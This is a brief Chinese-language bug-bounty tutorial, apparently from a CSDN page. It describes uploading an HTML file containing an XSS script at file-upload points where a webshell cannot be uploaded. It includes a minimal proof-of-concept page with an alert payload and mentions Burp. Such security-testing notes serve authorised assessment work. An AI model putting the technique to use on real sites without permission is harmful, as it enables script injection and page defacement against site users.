![](https://csdnimg.cn/release/download_crawler_static/88021515/bg1.jpg)
文件上传 html 嵌套 xss 语句
0x01 漏洞描述
在我们文件上传的时候很有很可能会遇见无法上传马子的情况,我相信很多人在这个时候都
会直接不管这一个上传点,然后在企业 src 里面这样的上传点可以试试上传一个 html 文件配
合 xss 语句,导致一个挂黑页弹窗的危害,在众测里面达到了中危的标准
0x02.漏洞测试工具:
Burp html 配合 xss 语句的文件
<!DOCTYPE html>
<html>
<head>
<title></title>
<meta charset="utf-8">
<script type="text/javascript">
alert("testxss");
</script>
</head>
<body>
</body>
</html>
漏洞点及测试方法
漏洞点:存在文件上传的地方
测试方法: 在文件上传的时候上传 Html 嵌套 xss 语句